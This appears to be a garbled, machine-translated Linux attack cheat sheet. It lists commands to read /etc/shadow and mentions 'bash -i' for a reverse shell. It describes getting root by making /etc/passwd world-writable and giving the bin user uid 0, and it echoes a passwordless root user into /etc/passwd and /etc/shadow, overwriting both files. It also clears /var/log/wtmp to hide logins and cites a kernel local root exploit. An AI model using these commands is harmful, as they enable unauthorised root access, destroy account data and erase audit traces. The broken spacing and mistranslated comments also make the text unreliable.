Catetcpasswd viewing the linux User catetcshadow viewing the User Password requires the root permission catetcsysconfignetwork-scriptsifcfg-ethnN representing the network card number viewing the ip information of the network card ifconfig viewing the local ip information catetcresolv. conf view DNS information bash-I in the reverse shel
Cat/Etc/Passwd// View linux Users
Cat/etc/shadow // The root permission is required to view the user password.
Cat/etc/sysconfig/network-scripts/ifcfg-ethn // N indicates the nic id to view the ip address of the NIC
Ifconfig// View the ip address of the Local Machine
Cat/etc/resolv. conf // view DNS information
Bash-I // you can use it in the reverse shell to display it intuitively.Command
Bash prompt: When you enter as a normal restricted user, you usually have a prompt similar to bash $. When you log in as Root, your prompt will become
Bash #.
System variable: Try echo $ USER/$ EUID. The system will tell you what USER it thinks you are.
Echo 1>/proc/sys/net/ipv4/if_forward is wrong, it should be echo 1>/proc/sys/net/ipv4/ip_forward,
Vim/proc/sys/net/ipv4/ip_forward. The default value is 0. That is, the kernel does not filter data packets and changes it to 1 to let the kernel filter data packets!
NetStat-GrepLISTEN grep: 80 view port
Service -- status-all grep running
Service -- status-all grep http
View running services
LsB _release-a view system version
Restart the ssh service:/usr/sbin/sshd stop
/Usr/sbin/sshd start
In the ssd_config File
PasswordAuthentication no,
Change it
PasswordAuthentication yes
Remote ssh Login
Otherwise, Access deni is displayed.Ed
Usepam yes may be used to establish the pam login method, for example, from other linux Hosts ssh to the server. If it is disabled, it cannot be enabled.
SuCainiao usage
Chomod 777/etc/passwd first
Then modify the bin user's gIdAnd uid is 0
Then passwd sets the bin password.
ThenCp/Bin/bash/sbin/nologin
Then, the su-bin can be used to access the rootshell.
This principle is that when ssh does not allow the root user to log on to the ssh terminal, we do not know the root password.
You can also
Sed-I s/bin: x: 1: 1/bin: x: 0: 1/g/etc/passwd
Gcc prtcl2.c-o local-static-Wall
Echo nosec: x: 0: 0: // bin/sh>/etc/passwd
Echo nosec:-1:-1:-1:-1:-1:-1:->/etc/shadow
Clear the last record cp/dev/null/var/log/wtmp
-----
DdIf =/dev/zero of = yourFileBs = 10 M count = 10 create a large M file to be used in Elevation of Privilege using Linux Kernel <= 2.6.17.4 (proc) Local Root Exploit.